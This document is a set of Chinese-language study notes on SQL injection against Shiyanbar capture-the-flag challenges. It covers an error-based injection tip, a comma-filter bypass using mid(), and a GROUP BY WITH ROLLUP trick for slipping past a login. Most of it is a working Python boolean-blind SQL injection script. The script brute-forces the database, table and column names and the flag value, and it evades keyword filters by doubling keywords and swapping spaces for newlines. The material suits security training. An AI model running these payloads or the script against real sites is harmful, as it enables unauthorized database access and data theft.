注入

學習筆記 UpdateXml() MYSQL顯錯注入

實驗吧 加了料的報錯注入 https://blog.csdn.net/xingyyn78/article/details/79737070

認真一點報錯注入
mid((database())from(1)for(1))
mid((database())from(2)for(1))
mid((database())from(3)for(1))
如果要用到mid函數，但是逗號被屏蔽了，就用這種形式

---

實驗吧 因缺思汀的繞過

表結構如下：

select * from
from `users`
where `user`=-1 || 1
group by `password` with rollup

用了這個語句後結果爲

在password字段聚合了一個null

select *
from `users`
where `user`=-1 || 1
group by `password` with rollup
limit 1 offset 5

調過前五條，拿出一個null(改一下select * 就行了)
配合其他write食用更佳
https://blog.csdn.net/wy_97/article/details/76085575
https://blog.csdn.net/yplee_8/article/details/52252549

---

實驗吧認真的

import requests

char_set = r'~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'

char_len = len(char_set)

url = r'http://ctf5.shiyanbar.com/web/earnest/index.php'

session = requests.session()

true_state = 'You are in'

next_line_flag = 0

def my_print(char_word, next_line=False):
    global next_line_flag
    if next_line:
        print()
        print('OK, got!', char_word)
        next_line_flag = 0
    else:
        if next_line_flag >= 70:
            print()
            next_line_flag = 0
        else:
            print(char_word, end='', flush=True)
            next_line_flag += 1

# 爆破數據庫的長度
# database_len = 0
# for x in range(50):
#     payload = "0'oorr((length(database()))=%s)oorr'0" % (x)
#     post_data = {'id': payload}
#     my_print(x)
#     res = session.post(url, data=post_data)
#     if true_state in res.text:
        # my_print(x, True)
        # database_len = x
        # break

database_len = 18  # 去掉
db_name = ''

# 爆破數據庫名
# for x in range(database_len):
#     for y in char_set:
#         payload = "0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (x+1, y)
#         post_data = {'id': payload}
#         my_print(y)
#         res = session.post(url, post_data)
#         if true_state in res.text:
#             db_name += y
#             my_print(db_name, True)
#             break

# 爆破錶名
# table_name = ''
# try:
#     for x in range(50):
#         for y in char_set:
#             payload = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='%s')oorr'0" % (x+1, y)
#             payload = payload.replace(' ', chr(0x0a))
#             post_data = {'id': payload}
#             my_print(y)
#             res = session.post(url, data=post_data)
#             if true_state in res.text:
#                 table_name += y
#                 my_print(table_name, True)
#                 break

# except KeyboardInterrupt:
#     print('\n停止爆破錶名，繼續下一步')
table_name = 'fiag'
# 爆破列名 不知道咋回事，列名好像壞了，爆不出來 fl$4g@id@username@password
column_name = ''
# try:
#     for x in range(50):
#         for y in char_set:
#             payload = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (x+1, y)
#             payload = payload.replace(' ', chr(0x0a))
#             post_data = {'id': payload}
#             my_print(y)
#             res = session.post(url, data=post_data)
#             if true_state in res.text:
#                 column_name += y
#                 my_print(column_name, True)
#                 break

# except KeyboardInterrupt:
#     print('\n停止爆破錶名，繼續下一步')

column_name = r'fl$4g@id@username@password'

# 爆破
column_name = r'fl$4g'
flag_dump = ''
try:
    for x in range(50):
        for y in char_set:
            payload = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (x+1, y)
            payload = payload.replace(' ', chr(0x0a))
            post_data = {'id': payload}
            my_print(y)
            res = session.post(url, data=post_data)
            if true_state in res.text:
                flag_dump += y
                my_print(flag_dump, True)
                break

except KeyboardInterrupt:
    print('\n停止爆破錶名，繼續下一步')